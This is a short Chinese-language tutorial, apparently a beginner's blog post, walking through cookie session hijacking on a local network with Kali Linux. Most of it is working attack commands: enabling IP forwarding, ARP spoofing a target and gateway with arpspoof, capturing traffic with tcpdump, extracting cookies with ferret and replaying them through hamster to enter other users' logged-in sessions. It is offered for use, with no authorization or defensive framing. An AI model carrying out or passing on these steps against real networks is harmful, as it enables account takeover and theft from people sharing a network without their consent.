kali局域网cookie会话劫持

kali局域网cookie会话劫持

再次声明
小白一枚
小白一枚
小白一枚

原理:
利用抓包实现,重现流量,登录别人登录过的网站。
话不多说,开始

用到的工具:VM,kali,arpspoof ,tcpdump,ferrrt,hamster
更多教程和软件尽在:https://xiaobaif.cn

第一步打开虚拟机
第二步开启IP流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward      修改
cat /proc/sys/net/ipv4/ip_forward           查看
1  										    1为开启,0为关闭

第三步开启arp欺骗
用法 : Arpspoof -i (自己网卡) -t 目标IP 网关
命令arpspoof -i eth0 -t 192.168.0.254 192.168.0.1

第四步使用tcpdump 对数据进行抓包,嗅探,我们这里用百度登录,个人中心之类的

tcpdump -i eth0 -w./cookie.pcap
用法-i自己的网卡,-w保存文件名字。pcap后缀名

kali局域网cookie会话劫持_第1张图片
kali局域网cookie会话劫持_第2张图片

第五步使用ferret工具,重新生成抓包后文件,生成了一个文件.txt
这个工具需要安装,自行百度安装

用法:ferret -r 文件名字.pcap
ferret -r cookie.pcap 


第六步
设置网页代理为IP为127.0.0.1 端口为1234

打开浏览器点右边点击 preferenges 进去最下面network proxy进去修改HTTP的代理

kali局域网cookie会话劫持_第3张图片
第七步使用hamster工具,打开浏览器输入127.0.0.1:1234


kali局域网cookie会话劫持_第4张图片

之后就可以登录已经登录过的网址了
kali局域网cookie会话劫持_第5张图片

结束

有错误还望大佬指点 小白一枚,有兴趣的可以互相学习

你可能感兴趣的:(笔记)